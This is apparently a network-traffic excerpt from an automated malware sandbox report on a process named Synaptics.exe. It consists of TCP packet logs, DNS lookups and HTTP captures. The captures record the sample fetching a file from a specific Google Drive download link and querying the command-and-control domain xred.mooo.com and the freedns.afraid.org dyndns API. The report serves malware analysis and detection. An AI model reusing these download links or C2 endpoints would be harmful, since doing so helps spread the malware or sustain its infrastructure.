                                                                                                                                        Dec 30, 2024 11:46:39.603454113 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.603461027 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.605223894 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.605227947 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.751374960 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.751445055 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.752439022 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.752459049 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.752677917 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.752691984 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.864082098 CET44349861142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.864144087 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.864168882 CET44349861142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.864209890 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.864315033 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.864347935 CET44349861142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.864407063 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.864957094 CET49873443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.864993095 CET44349873142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.865068913 CET49873443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.865323067 CET49873443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.865335941 CET44349873142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.918576002 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.918647051 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.918665886 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.918699980 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.918720961 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.918754101 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.918816090 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.918828964 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.918838024 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.918876886 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.919454098 CET49874443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.919497967 CET44349874142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.919574976 CET49874443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.919858932 CET49874443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.919872046 CET44349874142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.028389931 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.028440952 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.028541088 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.028561115 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.028572083 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.028606892 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.028942108 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.028981924 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.028991938 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.029032946 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.038588047 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.038606882 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.039232016 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.039258957 CET44349875142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.039333105 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.039623022 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.039637089 CET44349875142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.189914942 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.189961910 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.189990044 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.189999104 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.190006971 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.190049887 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.190053940 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.190063953 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.190089941 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.190114021 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.190798998 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.190807104 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.191204071 CET49878443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.191232920 CET44349878142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.191302061 CET49878443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.191493034 CET49878443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.191504955 CET44349878142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.490467072 CET44349873142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.490554094 CET49873443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.491148949 CET49873443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.491162062 CET44349873142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.491364002 CET49873443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.491369963 CET44349873142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.519912958 CET44349874142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.520020008 CET49874443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.520512104 CET49874443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.520523071 CET44349874142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.520564079 CET49874443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.520570993 CET44349874142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.654937983 CET44349875142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.655023098 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.656069040 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.656084061 CET44349875142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.656270027 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.656275988 CET44349875142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.790337086 CET44349878142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.790404081 CET49878443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.791028976 CET49878443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.791047096 CET44349878142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.791232109 CET49878443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:40.791239023 CET44349878142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.860641956 CET44349873142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.860780954 CET49873443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.860816002 CET44349873142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.860869884 CET49873443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.861038923 CET49873443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.861083031 CET44349873142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.861138105 CET49873443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.861805916 CET49882443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.861840010 CET44349882142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.861911058 CET49882443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.863286972 CET49882443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.863300085 CET44349882142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.891251087 CET44349874142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.891427040 CET49874443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.891452074 CET44349874142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.891514063 CET49874443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.891645908 CET49874443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.891690016 CET44349874142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.891753912 CET49874443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.892405987 CET49885443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.892446995 CET44349885142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:40.892563105 CET49885443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.892836094 CET49885443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:40.892849922 CET44349885142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.065313101 CET44349875142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.065366983 CET44349875142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.065421104 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.065448999 CET44349875142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.065463066 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.065481901 CET44349875142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.065500975 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.065541983 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.066530943 CET49875443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.066549063 CET44349875142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.067173958 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.067203045 CET44349889142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.067269087 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.067549944 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.067565918 CET44349889142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.210297108 CET44349878142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.210351944 CET44349878142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.210460901 CET44349878142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.210486889 CET49878443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.210534096 CET49878443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.211704016 CET49878443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.211726904 CET44349878142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.212364912 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.212424994 CET44349890142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.212513924 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.212990999 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.213005066 CET44349890142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.465508938 CET44349882142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.465605021 CET49882443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:41.466157913 CET44349882142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.466227055 CET49882443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:41.500194073 CET44349885142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.500291109 CET49885443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:41.500976086 CET44349885142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.501087904 CET49885443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:41.694341898 CET44349889142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.694413900 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:41.822364092 CET44349890142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:41.822432041 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:49.811342955 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:49.811366081 CET44349890142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:49.811531067 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:49.811567068 CET44349889142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:49.813914061 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:49.813921928 CET44349889142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:49.816178083 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:49.816198111 CET44349890142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:49.816920042 CET49885443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:49.816939116 CET44349885142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:49.817286015 CET44349885142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:49.817338943 CET49885443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:50.151525021 CET44349889142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:50.151575089 CET44349889142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:50.151598930 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:50.151621103 CET44349889142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:50.151638985 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:50.151655912 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:50.151663065 CET44349889142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:50.151686907 CET44349889142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:50.151704073 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:50.151735067 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:50.293272972 CET44349890142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:50.293325901 CET44349890142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:50.293343067 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:50.293371916 CET44349890142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:50.293390036 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:50.293432951 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:50.293477058 CET44349890142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:50.293514967 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:50.293519020 CET44349890142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:50.293572903 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:51.675201893 CET4971380192.168.2.569.42.215.252
                                                                                                                                        Dec 30, 2024 11:46:51.675837040 CET49885443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:51.675842047 CET49882443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:51.675923109 CET49890443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:51.675926924 CET49889443192.168.2.5142.250.186.129
                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Dec 30, 2024 11:46:21.128921986 CET6547153192.168.2.51.1.1.1
                                                                                                                                        Dec 30, 2024 11:46:21.136051893 CET53654711.1.1.1192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:22.046730042 CET5457353192.168.2.51.1.1.1
                                                                                                                                        Dec 30, 2024 11:46:22.053828955 CET53545731.1.1.1192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:22.057010889 CET5915653192.168.2.51.1.1.1
                                                                                                                                        Dec 30, 2024 11:46:22.063852072 CET53591561.1.1.1192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:22.153059959 CET5726153192.168.2.51.1.1.1
                                                                                                                                        Dec 30, 2024 11:46:22.160037994 CET53572611.1.1.1192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:28.324518919 CET4980553192.168.2.51.1.1.1
                                                                                                                                        Dec 30, 2024 11:46:28.331446886 CET53498051.1.1.1192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:32.855464935 CET5552153192.168.2.51.1.1.1
                                                                                                                                        Dec 30, 2024 11:46:32.862793922 CET53555211.1.1.1192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.527157068 CET5710853192.168.2.51.1.1.1
                                                                                                                                        Dec 30, 2024 11:46:38.651379108 CET53571081.1.1.1192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:42.054269075 CET5359592162.159.36.2192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:42.573746920 CET6501253192.168.2.51.1.1.1
                                                                                                                                        Dec 30, 2024 11:46:42.584916115 CET53650121.1.1.1192.168.2.5
                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                        Dec 30, 2024 11:46:21.128921986 CET192.168.2.51.1.1.10xa573Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:22.046730042 CET192.168.2.51.1.1.10x616dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:22.057010889 CET192.168.2.51.1.1.10x1a3aStandard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:22.153059959 CET192.168.2.51.1.1.10xeb24Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:28.324518919 CET192.168.2.51.1.1.10x34bbStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:32.855464935 CET192.168.2.51.1.1.10x5a6Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:38.527157068 CET192.168.2.51.1.1.10xe480Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:42.573746920 CET192.168.2.51.1.1.10xb282Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                        Dec 30, 2024 11:46:21.136051893 CET1.1.1.1192.168.2.50xa573No error (0)docs.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:22.053828955 CET1.1.1.1192.168.2.50x616dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:22.063852072 CET1.1.1.1192.168.2.50x1a3aNo error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:22.160037994 CET1.1.1.1192.168.2.50xeb24No error (0)drive.usercontent.google.com142.250.186.129A (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:28.331446886 CET1.1.1.1192.168.2.50x34bbName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:31.228234053 CET1.1.1.1192.168.2.50xbe9aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:31.228234053 CET1.1.1.1192.168.2.50xbe9aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:32.862793922 CET1.1.1.1192.168.2.50x5a6Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:38.651379108 CET1.1.1.1192.168.2.50xe480Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:46:42.584916115 CET1.1.1.1192.168.2.50xb282Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:47:25.072199106 CET1.1.1.1192.168.2.50x8880No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:47:25.072199106 CET1.1.1.1192.168.2.50x8880No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Dec 30, 2024 11:47:25.072199106 CET1.1.1.1192.168.2.50x8880No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                        • docs.google.com
                                                                                                                                        • drive.usercontent.google.com
                                                                                                                                        • freedns.afraid.org
                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.2.54971369.42.215.252806520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 30, 2024 11:46:22.070152998 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                        User-Agent: MyApp
                                                                                                                                        Host: freedns.afraid.org
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Dec 30, 2024 11:46:22.654459953 CET243INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:22 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Cache: MISS
                                                                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.2.549710142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:21 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:22 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Juf-uU04G4juQUYilCrJEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        1192.168.2.549709142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:21 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:22 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
